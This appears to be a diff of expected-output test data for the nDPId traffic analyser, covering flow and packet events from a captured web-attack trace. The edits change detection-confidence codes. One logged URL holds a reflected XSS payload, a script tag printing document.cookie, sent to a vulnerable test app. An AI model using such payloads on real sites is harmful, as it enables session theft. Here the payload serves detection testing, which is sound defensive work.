00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3266,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347360285,"flow_last_seen":1499347360285,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347360285,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56360,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3266,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":230,"flow_packet_id":1,"flow_last_seen":1499347360285,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347360285,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8h\/1AAD4GPdOsEAABwKgKMtwoAFB3hOCvAAAAAKACchDBygAAAgQFtAQCCAoBOmdSAAAAAAEDAwc="} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3267,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":230,"flow_packet_id":2,"flow_last_seen":1499347360285,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347360285,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3Ci3TdMGd4TgsKAScSD7qAAAAgQFtAQCCAoD5DjIATpnUgEDAwc="} 
@@ -1449,8 +1449,8 @@ 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3801,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":268,"flow_packet_id":1,"flow_last_seen":1499347423604,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347423604,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8TspAAD4GdwasEAABwKgKMt7MAFD5I+viAAAAAKACchD0fQAAAgQFtAQCCAoBOqUoAAAAAAEDAwc="} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3802,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":268,"flow_packet_id":2,"flow_last_seen":1499347423604,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347423604,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3szh681K+SPr46AScSDLowAAAgQFtAQCCAoD5HaeATqlKAEDAwc="} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3803,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":268,"flow_packet_id":3,"flow_last_seen":1499347423605,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347423605,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0TstAAD4Gdw2sEAABwKgKMt7MAFD5I+vj4evNS4AQAOVqqgAAAQEICgE6pSkD5Hae"} 
-01118{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3805,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":265,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347419786,"flow_last_seen":1499347423605,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":585,"flow_tot_l4_payload_len":585,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1499347423605,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56994,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/?name=%3Cscript%3Econsole.log%28%27AA0U7VCIO18AUKPZNB0ZXFCDF9PVHM0BRGOWM22EICNEPXK5UC%27%29%3Bconsole.log%28document.cookie%29%3B%3C%2Fscript%3E","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} -00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3817,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"finished","flow_packets_processed":310,"flow_first_seen":1499347228091,"flow_last_seen":1499347294990,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1869,"flow_tot_l4_payload_len":232370,"flow_avg_l4_payload_len":749,"midstream":0,"thread_ts_msec":1499347424876,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54956,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
+01118{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3805,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":265,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347419786,"flow_last_seen":1499347423605,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":585,"flow_tot_l4_payload_len":585,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1499347423605,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56994,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/?name=%3Cscript%3Econsole.log%28%27AA0U7VCIO18AUKPZNB0ZXFCDF9PVHM0BRGOWM22EICNEPXK5UC%27%29%3Bconsole.log%28document.cookie%29%3B%3C%2Fscript%3E","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} +00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3817,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"finished","flow_packets_processed":310,"flow_first_seen":1499347228091,"flow_last_seen":1499347294990,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1869,"flow_tot_l4_payload_len":232370,"flow_avg_l4_payload_len":749,"midstream":0,"thread_ts_msec":1499347424876,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54956,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3817,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347290163,"flow_last_seen":1499347295228,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347424876,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55618,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3817,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347290163,"flow_last_seen":1499347295228,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347424876,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55618,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3817,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347292725,"flow_last_seen":1499347298700,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347424876,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55646,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
@@ -1669,7 +1669,7 @@ 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4320,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":305,"flow_packet_id":1,"flow_last_seen":1499347485533,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347485533,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8jaZAAD4GOCqsEAABwKgKMuFiAFALNGwFAAAAAKACchAjOgAAAgQFtAQCCAoBOuGjAAAAAAEDAwc="} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4321,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":305,"flow_packet_id":2,"flow_last_seen":1499347485533,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347485533,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4WJ5n4cfCzRsBqAScSBsXQAAAgQFtAQCCAoD5LMYATrhowEDAwc="} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4322,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":305,"flow_packet_id":3,"flow_last_seen":1499347485534,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347485534,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0jadAAD4GODGsEAABwKgKMuFiAFALNGwGeZ+HIIAQAOULZQAAAQEICgE64aMD5LMY"} 
-00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4329,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"finished","flow_packets_processed":310,"flow_first_seen":1499347291442,"flow_last_seen":1499347358996,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1869,"flow_tot_l4_payload_len":232674,"flow_avg_l4_payload_len":750,"midstream":0,"thread_ts_msec":1499347485746,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55632,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4329,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"finished","flow_packets_processed":310,"flow_first_seen":1499347291442,"flow_last_seen":1499347358996,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1869,"flow_tot_l4_payload_len":232674,"flow_avg_l4_payload_len":750,"midstream":0,"thread_ts_msec":1499347485746,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55632,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4329,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":225,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347351299,"flow_last_seen":1499347356715,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347485746,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56266,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4329,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":225,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347351299,"flow_last_seen":1499347356715,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347485746,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56266,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4329,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347352698,"flow_last_seen":1499347357715,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347485746,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56280,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
@@ -1684,7 +1684,7 @@ 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4335,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":306,"flow_packet_id":1,"flow_last_seen":1499347486787,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347486787,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8D7tAAD4GthWsEAABwKgKMuFwAFB2mu1nAAAAAKACchA1KgAAAgQFtAQCCAoBOuLcAAAAAAEDAwc="} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4336,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":306,"flow_packet_id":2,"flow_last_seen":1499347486787,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347486787,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4XA0h5CedprtaKAScSC4rAAAAgQFtAQCCAoD5LRSATri3AEDAwc="} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4337,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":306,"flow_packet_id":3,"flow_last_seen":1499347486787,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347486787,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0D7xAAD4GthysEAABwKgKMuFwAFB2mu1oNIeQn4AQAOVXtAAAAQEICgE64twD5LRS"} 
-00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4344,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":304,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347484263,"flow_last_seen":1499347487799,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":383,"flow_tot_l4_payload_len":383,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1499347487799,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57684,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} +00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4344,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":304,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347484263,"flow_last_seen":1499347487799,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":383,"flow_tot_l4_payload_len":383,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1499347487799,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57684,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} 
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4354,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":307,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347489408,"flow_last_seen":1499347489408,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347489408,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57738,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4354,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":307,"flow_packet_id":1,"flow_last_seen":1499347489408,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347489408,"pkt":"ABm5CmnxAMGxFOsxCABFAAA86N5AAD4G3PGsEAABwKgKMuGKAFByXg2yAAAAAKACchAWcgAAAgQFtAQCCAoBOuVsAAAAAAEDAwc="} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4355,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":307,"flow_packet_id":2,"flow_last_seen":1499347489408,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347489408,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4YpoWWpFcl4Ns6AScSCJ7AAAAgQFtAQCCAoD5LbhATrlbAEDAwc="} 
@@ -1896,7 +1896,7 @@ 00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4836,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":264,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347418519,"flow_last_seen":1499347423606,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347546763,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56980,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4836,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":266,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347421069,"flow_last_seen":1499347426732,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347546763,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57008,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4836,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":266,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347421069,"flow_last_seen":1499347426732,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347546763,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57008,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4836,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"finished","flow_packets_processed":320,"flow_first_seen":1499347355229,"flow_last_seen":1499347423381,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1870,"flow_tot_l4_payload_len":232389,"flow_avg_l4_payload_len":726,"midstream":0,"thread_ts_msec":1499347546763,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56306,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4836,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"finished","flow_packets_processed":320,"flow_first_seen":1499347355229,"flow_last_seen":1499347423381,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1870,"flow_tot_l4_payload_len":232389,"flow_avg_l4_payload_len":726,"midstream":0,"thread_ts_msec":1499347546763,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56306,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4839,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":342,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347547687,"flow_last_seen":1499347547687,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347547687,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58360,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4839,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":342,"flow_packet_id":1,"flow_last_seen":1499347547687,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347547687,"pkt":"ABm5CmnxAMGxFOsxCABFAAA89IlAAD4G0UasEAABwKgKMuP4AFDYf+rfAAAAAKACchCXygAAAgQFtAQCCAoBOx5WAAAAAAEDAwc="} 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4840,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":342,"flow_packet_id":2,"flow_last_seen":1499347547687,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347547687,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4\/gRtWE22H\/q4KAScSAyDgAAAgQFtAQCCAoD5O\/LATseVgEDAwc="} 
@@ -1909,7 +1909,7 @@ 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4872,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":344,"flow_packet_id":1,"flow_last_seen":1499347551495,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347551495,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8D\/NAAD4Gtd2sEAABwKgKMuQgAFDTqC39AAAAAKACchBVpAAAAgQFtAQCCAoBOyIOAAAAAAEDAwc="} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4873,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":344,"flow_packet_id":2,"flow_last_seen":1499347551496,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347551496,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5CCgVV5k06gt\/qAScSBgYQAAAgQFtAQCCAoD5PODATsiDgEDAwc="} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4874,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":344,"flow_packet_id":3,"flow_last_seen":1499347551496,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347551496,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0D\/RAAD4GteSsEAABwKgKMuQgAFDTqC3+oFVeZYAQAOX\/aAAAAQEICgE7Ig4D5POD"} 
